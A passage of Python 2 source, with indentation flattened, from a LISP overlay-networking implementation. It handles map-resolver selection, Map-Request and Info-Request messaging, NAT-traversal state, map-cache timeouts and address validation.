#enddef
#endclass
#------------------------------------------------------------------------------
#
# lisp_get_map_server
#
# Return a lisp_ms() class instance. Variable 'address' is a lisp_address()
# class instance.
#
def lisp_get_map_server(address):
for ms in lisp_map_servers_list.values():
if (ms.map_server.is_exact_match(address)): return(ms)
#endfor
return(None)
#enddef
#
# lisp_get_any_map_server
#
# Return the first lisp_ms() class instance.
#
def lisp_get_any_map_server():
for ms in lisp_map_servers_list.values(): return(ms)
return(None)
#enddef
#
# lisp_get_map_resolver
#
# Get least recently used Map-Resolver if address is not supplied. Variable
# 'eid' takes on 3 values, an EID value in the form of lisp_address(), None,
# or "". Value "" means to use any MR, like the first one. Value None means
# to use a map-resolver-name that has not been configured (i.e. "all").
#
def lisp_get_map_resolver(address, eid):
if (address != None):
addr = address.print_address()
mr = None
for key in lisp_map_resolvers_list:
if (key.find(addr) == -1): continue
mr = lisp_map_resolvers_list[key]
#endfor
return(mr)
#endif
#
# Get database-mapping entry to find out which map-resolver name set we
# should use, or pick one from a non-configured mr-name list. Or, get the
# first one for info-requests.
#
if (eid == ""):
mr_name = ""
elif (eid == None):
mr_name = "all"
else:
db = lisp_db_for_lookups.lookup_cache(eid, False)
mr_name = "all" if db == None else db.use_mr_name
#endif
older = None
for mr in lisp_map_resolvers_list.values():
if (mr_name == ""): return(mr)
if (mr.mr_name != mr_name): continue
if (older == None or mr.last_used < older.last_used): older = mr
#endfor
return(older)
#enddef
#
# lisp_get_decent_map_resolver
#
# Get the Map-Resolver based on the LISP-Decent pull mapping system lookup
# algorithm
#
def lisp_get_decent_map_resolver(eid):
index = lisp_get_decent_index(eid)
dns_name = str(index) + "." + lisp_decent_dns_suffix
lprint("Use LISP-Decent map-resolver {} for EID {}".format( \
bold(dns_name, False), eid.print_prefix()))
older = None
for mr in lisp_map_resolvers_list.values():
if (dns_name != mr.dns_name): continue
if (older == None or mr.last_used < older.last_used): older = mr
#endfor
return(older)
#enddef
#
# lisp_ipv4_input
#
# Process IPv4 data packet for input checking.
#
def lisp_ipv4_input(packet):
#
# Check IGMP packet first. And don't do IP checksum and don't test TTL.
#
if (ord(packet[9]) == 2): return([True, packet])
#
# Now calculate checksum for verification.
#
checksum = struct.unpack("H", packet[10:12])[0]
if (checksum == 0):
dprint("Packet arrived with checksum of 0!")
else:
packet = lisp_ip_checksum(packet)
checksum = struct.unpack("H", packet[10:12])[0]
if (checksum != 0):
dprint("IPv4 header checksum failed for inner header")
packet = lisp_format_packet(packet[0:20])
dprint("Packet header: {}".format(packet))
return([False, None])
#endif
#endif
#
# Now check TTL and if not 0, recalculate checksum and return to
# encapsulate.
#
ttl = struct.unpack("B", packet[8:9])[0]
if (ttl == 0):
dprint("IPv4 packet arrived with ttl 0, packet discarded")
return([False, None])
elif (ttl == 1):
dprint("IPv4 packet {}, packet discarded".format( \
bold("ttl expiry", False)))
return([False, None])
#endif
ttl -= 1
packet = packet[0:8] + struct.pack("B", ttl) + packet[9::]
packet = packet[0:10] + struct.pack("H", 0) + packet[12::]
packet = lisp_ip_checksum(packet)
return([False, packet])
#enddef
#
# lisp_ipv6_input
#
# Process IPv6 data packet for input checking.
#
def lisp_ipv6_input(packet):
dest = packet.inner_dest
packet = packet.packet
#
# Now check TTL and if not 0, recalculate checksum and return to
# encapsulate.
#
ttl = struct.unpack("B", packet[7:8])[0]
if (ttl == 0):
dprint("IPv6 packet arrived with hop-limit 0, packet discarded")
return(None)
elif (ttl == 1):
dprint("IPv6 packet {}, packet discarded".format( \
bold("ttl expiry", False)))
return(None)
#endif
#
# Check for IPv6 link-local addresses. They should not go on overlay.
#
if (dest.is_ipv6_link_local()):
dprint("Do not encapsulate IPv6 link-local packets")
return(None)
#endif
ttl -= 1
packet = packet[0:7] + struct.pack("B", ttl) + packet[8::]
return(packet)
#enddef
#
# lisp_mac_input
#
# Process MAC data frame for input checking. All we need to do is get the
# destination MAC address.
#
def lisp_mac_input(packet):
return(packet)
#enddef
#
# lisp_rate_limit_map_request
#
# Check to see if we have sent a data-triggered Map-Request in the last
# LISP_MAP_REQUEST_RATE_LIMIT seconds. Return True if we should not send
# a Map-Request (rate-limit it).
#
def lisp_rate_limit_map_request(source, dest):
if (lisp_last_map_request_sent == None): return(False)
now = lisp_get_timestamp()
elapsed = now - lisp_last_map_request_sent
rate_limit = (elapsed < LISP_MAP_REQUEST_RATE_LIMIT)
if (rate_limit):
if (source != None): source = source.print_address()
dest = dest.print_address()
dprint("Rate-limiting Map-Request for {} -> {}".format(source, dest))
#endif
return(rate_limit)
#enddef
#
# lisp_send_map_request
#
# From this process, build and send a Map-Request for supplied EID.
#
def lisp_send_map_request(lisp_sockets, lisp_ephem_port, seid, deid, rloc):
global lisp_last_map_request_sent
#
# Set RLOC-probe parameters if caller wants Map-Request to be an
# RLOC-probe. We use probe_port as 4341 so we the ITR and RTR keying data
# structures can be the same.
#
probe_dest = probe_port = None
if (rloc):
probe_dest = rloc.rloc
probe_port = rloc.translated_port if lisp_i_am_rtr else LISP_DATA_PORT
#endif
#
# If there are no RLOCs found, do not build and send the Map-Request.
#
itr_rloc4, itr_rloc6, device = lisp_myrlocs
if (itr_rloc4 == None):
lprint("Suppress sending Map-Request, IPv4 RLOC not found")
return
#endif
if (itr_rloc6 == None and probe_dest != None and probe_dest.is_ipv6()):
lprint("Suppress sending Map-Request, IPv6 RLOC not found")
return
#endif
map_request = lisp_map_request()
map_request.record_count = 1
map_request.nonce = lisp_get_control_nonce()
map_request.rloc_probe = (probe_dest != None)
#
# Hold request nonce so we can match replies from xTRs that have multiple
# RLOCs. Reason being is because source address may not be the probed
# destination. And on our ETR implementation, we can get the probe request
# destination in the lisp-core/lisp-etr/lisp-rtr processes.
#
if (rloc): rloc.last_rloc_probe_nonce = map_request.nonce
sg = deid.is_multicast_address()
if (sg):
map_request.target_eid = seid
map_request.target_group = deid
else:
map_request.target_eid = deid
#endif
#
# If lookup is for an IPv6 EID or there is a signature key configured and
# there is a private key file in current directory, tell lisp_map_request()
# to sign Map-Request. For an RTR, we want to verify its map-request
# signature, so it needs to include its own IPv6 EID that matches the
# private-key file.
#
if (map_request.rloc_probe == False):
db = lisp_get_signature_eid()
if (db):
map_request.signature_eid.copy_address(db.eid)
map_request.privkey_filename = "./lisp-sig.pem"
#endif
#endif
#
# Fill in source-eid field.
#
if (seid == None or sg):
map_request.source_eid.afi = LISP_AFI_NONE
else:
map_request.source_eid = seid
#endif
#
# If ITR-RLOC is a private IPv4 address, we need it to be a global address
# for RLOC-probes.
#
# However, if we are an RTR and have a private address, the RTR is behind
# a NAT. The RLOC-probe is encapsulated with source-port 4341 to get
# through NAT. The ETR receiving the RLOC-probe request must return the
# RLOC-probe reply with same translated address/port pair (the same values
# when it encapsulates data packets).
#
if (probe_dest != None and lisp_nat_traversal and lisp_i_am_rtr == False):
if (probe_dest.is_private_address() == False):
itr_rloc4 = lisp_get_any_translated_rloc()
#endif
if (itr_rloc4 == None):
lprint("Suppress sending Map-Request, translated RLOC not found")
return
#endif
#endif
#
# Fill in ITR-RLOCs field. If we don't find an IPv6 address there is
# nothing to store in the ITR-RLOCs list. And we have to use an inner
# source address of 0::0.
#
if (probe_dest == None or probe_dest.is_ipv4()):
if (lisp_nat_traversal and probe_dest == None):
ir = lisp_get_any_translated_rloc()
if (ir != None): itr_rloc4 = ir
#endif
map_request.itr_rlocs.append(itr_rloc4)
#endif
if (probe_dest == None or probe_dest.is_ipv6()):
if (itr_rloc6 == None or itr_rloc6.is_ipv6_link_local()):
itr_rloc6 = None
else:
map_request.itr_rloc_count = 1 if (probe_dest == None) else 0
map_request.itr_rlocs.append(itr_rloc6)
#endif
#endif
#
# Decide what inner source address needs to be for the ECM. We have to
# look at the address-family of the destination EID. If the destination-EID
# is a MAC address, we will use IPv4 in the inner header with a destination
# address of 0.0.0.0.
#
if (probe_dest != None and map_request.itr_rlocs != []):
itr_rloc = map_request.itr_rlocs[0]
else:
if (deid.is_ipv4()):
itr_rloc = itr_rloc4
elif (deid.is_ipv6()):
itr_rloc = itr_rloc6
else:
itr_rloc = itr_rloc4
#endif
#endif
#
# And finally add one EID record. The EID we are looking up.
#
packet = map_request.encode(probe_dest, probe_port)
map_request.print_map_request()
#
# If this is an RLOC-probe, send directly to RLOC and not to mapping
# system. If the RLOC is behind a NAT, we need to data encapsulate it
# from port 4341 to translated destination address and port.
#
if (probe_dest != None):
if (rloc.is_rloc_translated()):
nat_info = lisp_get_nat_info(probe_dest, rloc.rloc_name)
#
# Handle gleaned RLOC case.
#
if (nat_info == None):
r = rloc.rloc.print_address_no_iid()
g = "gleaned-{}".format(r)
p = rloc.translated_port
nat_info = lisp_nat_info(r, g, p)
#endif
lisp_encapsulate_rloc_probe(lisp_sockets, probe_dest, nat_info,
packet)
return
#endif
addr_str = probe_dest.print_address_no_iid()
dest = lisp_convert_4to6(addr_str)
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#endif
#
# Get least recently used Map-Resolver. In the RTR make sure there is a
# Map-Resolver in lisp.config with no mr-name or mr-name=all.
#
local_eid = None if lisp_i_am_rtr else seid
if (lisp_decent_pull_xtr_configured()):
mr = lisp_get_decent_map_resolver(deid)
else:
mr = lisp_get_map_resolver(None, local_eid)
#endif
if (mr == None):
lprint("Cannot find Map-Resolver for source-EID {}".format( \
green(seid.print_address(), False)))
return
#endif
mr.last_used = lisp_get_timestamp()
mr.map_requests_sent += 1
if (mr.last_nonce == 0): mr.last_nonce = map_request.nonce
#
# Send ECM based Map-Request to Map-Resolver.
#
if (seid == None): seid = itr_rloc
lisp_send_ecm(lisp_sockets, packet, seid, lisp_ephem_port, deid,
mr.map_resolver)
#
# Set global timestamp for rate-limiting.
#
lisp_last_map_request_sent = lisp_get_timestamp()
#
# Do DNS lookup for Map-Resolver if "dns-name" configured.
#
mr.resolve_dns_name()
return
#enddef
#
# lisp_send_info_request
#
# Send info-request to any map-server configured or to an address supplied
# by the caller.
#
def lisp_send_info_request(lisp_sockets, dest, port, device_name):
#
# Build Info-Request message.
#
info = lisp_info()
info.nonce = lisp_get_control_nonce()
if (device_name): info.hostname += "-" + device_name
addr_str = dest.print_address_no_iid()
#
# Find next-hop for interface 'device_name' if supplied. The "ip route"
# command will produce this:
#
# pi@lisp-pi ~/lisp $ ip route | egrep "default via"
# default via 192.168.1.1 dev eth1
# default via 192.168.1.1 dev wlan0
#
# We then turn the line we want into a "ip route add" command. Then at
# the end of this function we remove the route.
#
# We do this on the ETR only so we don't have Info-Requests from the lisp-
# itr and lisp-etr process both add and delete host routes (for Info-
# Request sending purposes) at the same time.
#
added_route = False
if (device_name):
save_nh = lisp_get_host_route_next_hop(addr_str)
#
# If we found a host route for the map-server, then both the lisp-itr
# and lisp-etr processes are in this routine at the same time.
# wait for the host route to go away before proceeding. We will use
# the map-server host route as a IPC lock. For the data port, only
# the lisp-etr processes will add host route to the RTR for Info-
# Requests.
#
if (port == LISP_CTRL_PORT and save_nh != None):
while (True):
time.sleep(.01)
save_nh = lisp_get_host_route_next_hop(addr_str)
if (save_nh == None): break
#endwhile
#endif
default_routes = lisp_get_default_route_next_hops()
for device, nh in default_routes:
if (device != device_name): continue
#
# If there is a data route pointing to same next-hop, don't
# change the routing table. Otherwise, remove saved next-hop,
# add the one we want and later undo this.
#
if (save_nh != nh):
if (save_nh != None):
lisp_install_host_route(addr_str, save_nh, False)
#endif
lisp_install_host_route(addr_str, nh, True)
added_route = True
#endif
break
#endfor
#endif
#
# Encode the Info-Request message and print it.
#
packet = info.encode()
info.print_info()
#
# Send it.
#
cd = "(for control)" if port == LISP_CTRL_PORT else "(for data)"
cd = bold(cd, False)
p = bold("{}".format(port), False)
a = red(addr_str, False)
rtr = "RTR " if port == LISP_DATA_PORT else "MS "
lprint("Send Info-Request to {}{}, port {} {}".format(rtr, a, p, cd))
#
# Send packet to control port via control-sockets interface. For a 4341
# do the same via the lisp-core process but prepend a LISP data header
# to the message.
#
if (port == LISP_CTRL_PORT):
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
else:
header = lisp_data_header()
header.instance_id(0xffffff)
header = header.encode()
if (header):
packet = header + packet
#
# The NAT-traversal spec says to use port 4342 as the source port
# but that would mean return data packets will go to the lisp-core
# process. We are going to use an ephemeral port here so packets
# come to this lisp-etr process. The commented out call is to
# allow Info-Requests to use source port 4342 but will break the
# data-plane in this lispers.net implementation.
#
lisp_send(lisp_sockets, dest, LISP_DATA_PORT, packet)
# lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
#endif
#endif
#
# Remove static route to RTR if had added one and restore data route.
#
if (added_route):
lisp_install_host_route(addr_str, None, False)
if (save_nh != None): lisp_install_host_route(addr_str, save_nh, True)
#endif
return
#enddef
#
# lisp_process_info_request
#
# Process received Info-Request message. Return a Info-Reply to sender.
#
def lisp_process_info_request(lisp_sockets, packet, addr_str, sport, rtr_list):
#
# Parse Info-Request so we can return the nonce in the Info-Reply.
#
info = lisp_info()
packet = info.decode(packet)
if (packet == None): return
info.print_info()
#
# Start building the Info-Reply. Copy translated source and translated
# source port from Info-Request.
#
info.info_reply = True
info.global_etr_rloc.store_address(addr_str)
info.etr_port = sport
#
# Put Info-Request hostname (if it was encoded) in private-rloc in
# Info-Reply. Encode it as an AFI=17 distinguished-name.
#
if (info.hostname != None):
info.private_etr_rloc.afi = LISP_AFI_NAME
info.private_etr_rloc.store_address(info.hostname)
#endif
if (rtr_list != None): info.rtr_list = rtr_list
packet = info.encode()
info.print_info()
#
# Send the Info-Reply via the lisp-core process. We are sending from
# a udp46 socket, so we need to prepend ::ffff.
#
lprint("Send Info-Reply to {}".format(red(addr_str, False)))
dest = lisp_convert_4to6(addr_str)
lisp_send(lisp_sockets, dest, sport, packet)
#
# Cache info sources so we can decide to process Map-Requests from it
# specially so we can proxy-Map-Request when the sources are behind NATs.
#
info_source = lisp_info_source(info.hostname, addr_str, sport)
info_source.cache_address_for_info_source()
return
#enddef
#
# lisp_get_signature_eid
#
# Go through the lisp_db_list (database-mappings) and return the first entry
# with signature-eid is True.
#
def lisp_get_signature_eid():
for db in lisp_db_list:
if (db.signature_eid): return(db)
#endfor
return(None)
#enddef
#
# lisp_get_any_translated_port
#
# Find a translated port so we can set it to the inner UDP port number for
# ECM Map-Requests.
#
def lisp_get_any_translated_port():
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
if (rloc_entry.translated_rloc.is_null()): continue
return(rloc_entry.translated_port)
#endfor
#endfor
return(None)
#enddef
#
# lisp_get_any_translated_rloc
#
# Find a translated RLOC in any lisp_mapping() from the lisp_db_list. We need
# this to store in an RLE for (S,G) Map-Registers when the ETR is behind NAT
# devies.
#
def lisp_get_any_translated_rloc():
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
if (rloc_entry.translated_rloc.is_null()): continue
return(rloc_entry.translated_rloc)
#endfor
#endfor
return(None)
#enddef
#
# lisp_get_all_translated_rlocs
#
# Return an array of each translated RLOC address in string format.
#
def lisp_get_all_translated_rlocs():
rloc_list = []
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
if (rloc_entry.is_rloc_translated() == False): continue
addr = rloc_entry.translated_rloc.print_address_no_iid()
rloc_list.append(addr)
#endfor
#endfor
return(rloc_list)
#enddef
#
# lisp_update_default_routes
#
# We are an ITR and we received a new RTR-list from the Map-Server. Update
# the RLOCs of the default map-cache entries if they are different.
#
def lisp_update_default_routes(map_resolver, iid, rtr_list):
ignore_private = (os.getenv("LISP_RTR_BEHIND_NAT") != None)
new_rtr_list = {}
for rloc in rtr_list:
if (rloc == None): continue
addr = rtr_list[rloc]
if (ignore_private and addr.is_private_address()): continue
new_rtr_list[rloc] = addr
#endfor
rtr_list = new_rtr_list
prefix_list = []
for afi in [LISP_AFI_IPV4, LISP_AFI_IPV6, LISP_AFI_MAC]:
if (afi == LISP_AFI_MAC and lisp_l2_overlay == False): break
#
# Do unicast routes. We assume unicast and multicast routes are sync'ed
# with the same RLOC-set.
#
prefix = lisp_address(afi, "", 0, iid)
prefix.make_default_route(prefix)
mc = lisp_map_cache.lookup_cache(prefix, True)
if (mc):
if (mc.checkpoint_entry):
lprint("Updating checkpoint entry for {}".format( \
green(mc.print_eid_tuple(), False)))
elif (mc.do_rloc_sets_match(rtr_list.values())):
continue
#endif
mc.delete_cache()
#endif
prefix_list.append([prefix, ""])
#
# Do multicast routes.
#
group = lisp_address(afi, "", 0, iid)
group.make_default_multicast_route(group)
gmc = lisp_map_cache.lookup_cache(group, True)
if (gmc): gmc = gmc.source_cache.lookup_cache(prefix, True)
if (gmc): gmc.delete_cache()
prefix_list.append([prefix, group])
#endfor
if (len(prefix_list) == 0): return
#
# Build RLOC-set.
#
rloc_set = []
for rtr in rtr_list:
rtr_addr = rtr_list[rtr]
rloc_entry = lisp_rloc()
rloc_entry.rloc.copy_address(rtr_addr)
rloc_entry.priority = 254
rloc_entry.mpriority = 255
rloc_entry.rloc_name = "RTR"
rloc_set.append(rloc_entry)
#endfor
for prefix in prefix_list:
mc = lisp_mapping(prefix[0], prefix[1], rloc_set)
mc.mapping_source = map_resolver
mc.map_cache_ttl = LISP_MR_TTL * 60
mc.add_cache()
lprint("Add {} to map-cache with RTR RLOC-set: {}".format( \
green(mc.print_eid_tuple(), False), rtr_list.keys()))
rloc_set = copy.deepcopy(rloc_set)
#endfor
return
#enddef
#
# lisp_process_info_reply
#
# Process received Info-Reply message. Store global RLOC and translated port
# in database-mapping entries if requested.
#
# Returns [global-rloc-address, translated-port-number, new_rtr_set].
#
def lisp_process_info_reply(source, packet, store):
#
# Parse Info-Reply.
#
info = lisp_info()
packet = info.decode(packet)
if (packet == None): return([None, None, False])
info.print_info()
#
# Store RTR list.
#
new_rtr_set = False
for rtr in info.rtr_list:
addr_str = rtr.print_address_no_iid()
if (lisp_rtr_list.has_key(addr_str)):
if (lisp_register_all_rtrs == False): continue
if (lisp_rtr_list[addr_str] != None): continue
#endif
new_rtr_set = True
lisp_rtr_list[addr_str] = rtr
#endfor
#
# If an ITR, install default map-cache entries.
#
if (lisp_i_am_itr and new_rtr_set):
if (lisp_iid_to_interface == {}):
lisp_update_default_routes(source, lisp_default_iid, lisp_rtr_list)
else:
for iid in lisp_iid_to_interface.keys():
lisp_update_default_routes(source, int(iid), lisp_rtr_list)
#endfor
#endif
#endif
#
# Either store in database-mapping entries or return to caller.
#
if (store == False):
return([info.global_etr_rloc, info.etr_port, new_rtr_set])
#endif
#
# If no private-etr-rloc was supplied in the Info-Reply, use the global
# RLOC for all private RLOCs in the database-mapping entries.
#
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
rloc = rloc_entry.rloc
interface = rloc_entry.interface
if (interface == None):
if (rloc.is_null()): continue
if (rloc.is_local() == False): continue
if (info.private_etr_rloc.is_null() == False and
rloc.is_exact_match(info.private_etr_rloc) == False):
continue
#endif
elif (info.private_etr_rloc.is_dist_name()):
rloc_name = info.private_etr_rloc.address
if (rloc_name != rloc_entry.rloc_name): continue
#endif
eid_str = green(db.eid.print_prefix(), False)
rloc_str = red(rloc.print_address_no_iid(), False)
rlocs_match = info.global_etr_rloc.is_exact_match(rloc)
if (rloc_entry.translated_port == 0 and rlocs_match):
lprint("No NAT for {} ({}), EID-prefix {}".format(rloc_str,
interface, eid_str))
continue
#endif
#
# Nothing changed?
#
translated = info.global_etr_rloc
stored = rloc_entry.translated_rloc
if (stored.is_exact_match(translated) and
info.etr_port == rloc_entry.translated_port): continue
lprint("Store translation {}:{} for {} ({}), EID-prefix {}". \
format(red(info.global_etr_rloc.print_address_no_iid(), False),
info.etr_port, rloc_str, interface, eid_str))
rloc_entry.store_translated_rloc(info.global_etr_rloc,
info.etr_port)
#endfor
#endfor
return([info.global_etr_rloc, info.etr_port, new_rtr_set])
#enddef
#
# lisp_test_mr
#
# Send Map-Requests for arbitrary EIDs to (1) prime the map-cache and to (2)
# test the RTT of the Map-Resolvers.
#
def lisp_test_mr(lisp_sockets, port):
return
lprint("Test Map-Resolvers")
eid = lisp_address(LISP_AFI_IPV4, "", 0, 0)
eid6 = lisp_address(LISP_AFI_IPV6, "", 0, 0)
#
# Send 10.0.0.1 and 192.168.0.1
#
eid.store_address("10.0.0.1")
lisp_send_map_request(lisp_sockets, port, None, eid, None)
eid.store_address("192.168.0.1")
lisp_send_map_request(lisp_sockets, port, None, eid, None)
#
# Send 0100::1 and 8000::1.
#
eid6.store_address("0100::1")
lisp_send_map_request(lisp_sockets, port, None, eid6, None)
eid6.store_address("8000::1")
lisp_send_map_request(lisp_sockets, port, None, eid6, None)
#
# Restart periodic timer.
#
lisp_test_mr_timer = threading.Timer(LISP_TEST_MR_INTERVAL, lisp_test_mr,
[lisp_sockets, port])
lisp_test_mr_timer.start()
return
#enddef
#
# lisp_update_local_rloc
#
# Check if local RLOC has changed and update the lisp_rloc() entry in
# lisp_db(). That is check to see if the private address changed since this
# ETR could have moved to another NAT or the same NAT device reassigned a
# new private address.
#
# This function is also used when the interface address is not private. It
# allows us to change the RLOC when the address changes.
#
def lisp_update_local_rloc(rloc):
if (rloc.interface == None): return
addr = lisp_get_interface_address(rloc.interface)
if (addr == None): return
old = rloc.rloc.print_address_no_iid()
new = addr.print_address_no_iid()
if (old == new): return
lprint("Local interface address changed on {} from {} to {}".format( \
rloc.interface, old, new))
rloc.rloc.copy_address(addr)
lisp_myrlocs[0] = addr
return
#enddef
#
# lisp_update_encap_port
#
# Check to see if the encapsulation port changed for an RLOC for the supplied
# map-cache entry.
#
def lisp_update_encap_port(mc):
for rloc in mc.rloc_set:
nat_info = lisp_get_nat_info(rloc.rloc, rloc.rloc_name)
if (nat_info == None): continue
if (rloc.translated_port == nat_info.port): continue
lprint(("Encap-port changed from {} to {} for RLOC {}, " + \
"EID-prefix {}").format(rloc.translated_port, nat_info.port,
red(rloc.rloc.print_address_no_iid(), False),
green(mc.print_eid_tuple(), False)))
rloc.store_translated_rloc(rloc.rloc, nat_info.port)
#endfor
return
#enddef
#
# lisp_timeout_map_cache_entry
#
# Check if a specific map-cache entry needs to be removed due timer expiry.
# If entry does not time out, go through RLOC-set to see if the encapsulation
# port needs updating.
#
# If "program-hardware = yes" is configured, then check a platform specific
# flag (an Arista platform specific command).
#
def lisp_timeout_map_cache_entry(mc, delete_list):
if (mc.map_cache_ttl == None):
lisp_update_encap_port(mc)
return([True, delete_list])
#endif
now = lisp_get_timestamp()
#
# Check refresh timers. Native-Forward entries just return if active,
# else check for encap-port changes for NAT entries. Then return if
# entry still active.
#
if (mc.last_refresh_time + mc.map_cache_ttl > now):
if (mc.action == LISP_NO_ACTION): lisp_update_encap_port(mc)
return([True, delete_list])
#endif
#
# Timed out.
#
elapsed = lisp_print_elapsed(mc.last_refresh_time)
prefix_str = mc.print_eid_tuple()
lprint("Map-cache entry for EID-prefix {} has {}, had uptime of {}". \
format(green(prefix_str, False), bold("timed out", False), elapsed))
#
# Add to delete-list to remove after this loop.
#
delete_list.append(mc)
return([True, delete_list])
#enddef
#
# lisp_timeout_map_cache_walk
#
# Walk the entries in the lisp_map_cache(). And then subsequently walk the
# entries in lisp_mapping.source_cache().
#
def lisp_timeout_map_cache_walk(mc, parms):
delete_list = parms[0]
checkpoint_list = parms[1]
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()):
status, delete_list = lisp_timeout_map_cache_entry(mc, delete_list)
if (delete_list == [] or mc != delete_list[-1]):
checkpoint_list = lisp_write_checkpoint_entry(checkpoint_list, mc)
#endif
return([status, parms])
#endif
if (mc.source_cache == None): return([True, parms])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
parms = mc.source_cache.walk_cache(lisp_timeout_map_cache_entry, parms)
return([True, parms])
#enddef
#
# lisp_timeout_map_cache
#
# Look at TTL expiration for each map-cache entry.
#
def lisp_timeout_map_cache(lisp_map_cache):
parms = [[], []]
parms = lisp_map_cache.walk_cache(lisp_timeout_map_cache_walk, parms)
#
# Now remove from lisp_referral_cache all the timed out entries on the
# delete_list[].
#
delete_list = parms[0]
for mc in delete_list: mc.delete_cache()
#
# Write contents of checkpoint_list array to checkpoint file.
#
checkpoint_list = parms[1]
lisp_checkpoint(checkpoint_list)
return
#enddef
#
# lisp_store_nat_info
#
# Store source RLOC and port number of an Info-Request packet sent to port
# 4341 where the packet was translated by a NAT device.
#
# The lisp_nat_state_info{} is a dictionary array with an array a lisp_nat_
# info() values. We keep all the current and previous NAT state associated
# with the Info-Request hostname. This is so we can track how much movement
# is occuring.
#
# Return True if the address and port number changed so the caller can fix up
# RLOCs in map-cache entries.
#
def lisp_store_nat_info(hostname, rloc, port):
addr_str = rloc.print_address_no_iid()
msg = "{} NAT state for {}, RLOC {}, port {}".format("{}",
blue(hostname, False), red(addr_str, False), port)
new_nat_info = lisp_nat_info(addr_str, hostname, port)
if (lisp_nat_state_info.has_key(hostname) == False):
lisp_nat_state_info[hostname] = [new_nat_info]
lprint(msg.format("Store initial"))
return(True)
#endif
#
# The youngest entry is always the first element. So check to see if this
# is a refresh of the youngest (current) entry.
#
nat_info = lisp_nat_state_info[hostname][0]
if (nat_info.address == addr_str and nat_info.port == port):
nat_info.uptime = lisp_get_timestamp()
lprint(msg.format("Refresh existing"))
return(False)
#endif
#
# So the youngest entry is not the newest entry. See if it exists as
# an old entry. If not, we prepend the new state, otherwise, we prepend
# the new state and remove the old state from the array.
#
old_entry = None
for nat_info in lisp_nat_state_info[hostname]:
if (nat_info.address == addr_str and nat_info.port == port):
old_entry = nat_info
break
#endif
#endfor
if (old_entry == None):
lprint(msg.format("Store new"))
else:
lisp_nat_state_info[hostname].remove(old_entry)
lprint(msg.format("Use previous"))
#endif
existing = lisp_nat_state_info[hostname]
lisp_nat_state_info[hostname] = [new_nat_info] + existing
return(True)
#enddef
#
# lisp_get_nat_info
#
# Do lookup to get port number to store in map-cache entry as the encapsulation
# port.
#
def lisp_get_nat_info(rloc, hostname):
if (lisp_nat_state_info.has_key(hostname) == False): return(None)
addr_str = rloc.print_address_no_iid()
for nat_info in lisp_nat_state_info[hostname]:
if (nat_info.address == addr_str): return(nat_info)
#endfor
return(None)
#enddef
#
# lisp_build_info_requests
#
# Check database-mappings to see if there are any private local RLOCs. If
# so, get the translated global RLOC by sending an Info-Request to a
# Map-Server.
#
# To support multi-homing, that is more than one "interface = <device>"
# rloc sub-command clause, you need the following default routes in the
# kernel so Info-Requests can be load-split across interfaces:
#
# sudo ip route add default via <next-hop> dev eth0
# sudo ip route append default via <another-or-same-next-hop> dev eth1
#
# By having these default routes, we can get the next-hop address for the
# NAT interface we are sending the 4341 Info-Request to install a emphemeral
# static route to force the Info-Request to go out a specific interface.
#
def lisp_build_info_requests(lisp_sockets, dest, port):
if (lisp_nat_traversal == False): return
#
# Send Info-Request to each configured Map-Resolver and exit loop.
# If we don't find one, try finding a Map-Server. We may send Info-
# Request to an RTR to open up NAT state.
#
dest_list = []
mr_list = []
if (dest == None):
for mr in lisp_map_resolvers_list.values():
mr_list.append(mr.map_resolver)
#endif
dest_list = mr_list
if (dest_list == []):
for ms in lisp_map_servers_list.values():
dest_list.append(ms.map_server)
#endfor
#endif
if (dest_list == []): return
else:
dest_list.append(dest)
#endif
#
# Find the NAT-traversed interfaces.
#
rloc_list = {}
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
lisp_update_local_rloc(rloc_entry)
if (rloc_entry.rloc.is_null()): continue
if (rloc_entry.interface == None): continue
addr = rloc_entry.rloc.print_address_no_iid()
if (addr in rloc_list): continue
rloc_list[addr] = rloc_entry.interface
#endfor
#endfor
if (rloc_list == {}):
lprint('Suppress Info-Request, no "interface = <device>" RLOC ' + \
"found in any database-mappings")
return
#endif
#
# Send out Info-Requests out the NAT-traversed interfaces that have
# addresses assigned on them.
#
for addr in rloc_list:
interface = rloc_list[addr]
a = red(addr, False)
lprint("Build Info-Request for private address {} ({})".format(a,
interface))
device = interface if len(rloc_list) > 1 else None
for dest in dest_list:
lisp_send_info_request(lisp_sockets, dest, port, device)
#endfor
#endfor
#
# Do DNS lookup for Map-Resolver if "dns-name" configured.
#
if (mr_list != []):
for mr in lisp_map_resolvers_list.values():
mr.resolve_dns_name()
#endfor
#endif
return
#enddef
#
# lisp_valid_address_format
#
# Check to see if the string is a valid address. We are validating IPv4, IPv6
# and MAC addresses.
#
def lisp_valid_address_format(kw, value):
if (kw != "address"): return(True)
#
# Check if address is a Distinguished-Name. Must have single quotes.
# Check this first because names could have ".", ":", or "-" in them.
#
if (value[0] == "'" and value[-1] == "'"): return(True)
#
# Do IPv4 test for dotted decimal x.x.x.x.
#
if (value.find(".") != -1):
addr = value.split(".")
if (len(addr) != 4): return(False)
for byte in addr:
if (byte.isdigit() == False): return(False)
if (int(byte) > 255): return(False)
#endfor
return(True)
#endif
#
# Test for a geo-prefix. They have N, S, W, E characters in them.
#
if (value.find("-") != -1):
addr = value.split("-")
for i in ["N", "S", "W", "E"]:
if (i in addr):
if (len(addr) < 8): return(False)
return(True)
#endif
#endfor
#endif
#
# Do MAC test in format xxxx-xxxx-xxxx.
#
if (value.find("-") != -1):
addr = value.split("-")
if (len(addr) != 3): return(False)
for hexgroup in addr:
try: int(hexgroup, 16)
except: return(False)
#endfor
return(True)
#endif
#
# Do IPv6 test in format aaaa:bbbb::cccc:dddd
#
if (value.find(":") != -1):
addr = value.split(":")
if (len(addr) < 2): return(False)
found_null = False
count = 0
for hexgroup in addr:
count += 1
if (hexgroup == ""):
if (found_null):
if (len(addr) == count): break
if (count > 2): return(False)
#endif
found_null = True
continue
#endif
try: int(hexgroup, 16)
except: return(False)
#endfor
return(True)
#endif
#
# Do E.164 format test. The address is a "+" followed by <= 15 BCD digits.
#
if (value[0] == "+"):
addr = value[1::]
for digit in addr:
if (digit.isdigit() == False): return(False)
#endfor
